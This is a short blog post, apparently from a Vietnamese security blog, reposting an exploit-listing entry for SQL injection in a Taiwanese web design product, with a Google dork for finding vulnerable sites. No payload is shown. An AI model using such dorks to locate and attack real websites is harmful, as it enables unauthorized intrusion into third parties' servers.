Sharing a Dork for Chinese Websites Vulnerable to SQL Injection

Exploit  : Web Design 事業通 SQL Injection
Exploit Author : Ashiyane Digital Security Team
Vendor Homepage : http://tw.sayato.com/
Google Dork : intext:"事業通" news_show.php
Tested On : Win 10 / Google Chrome / Mozilla Firefox



Demos


About Vo Uu

The author specializes in researching hacking, security and marketing techniques, has an unusual point of view, digs deep into problems, and gives feedback frankly. If you use posts from this blog, please credit the author as the source! The author very much hopes for contributions and input from the community so that Vietnam's network security becomes ever safer!
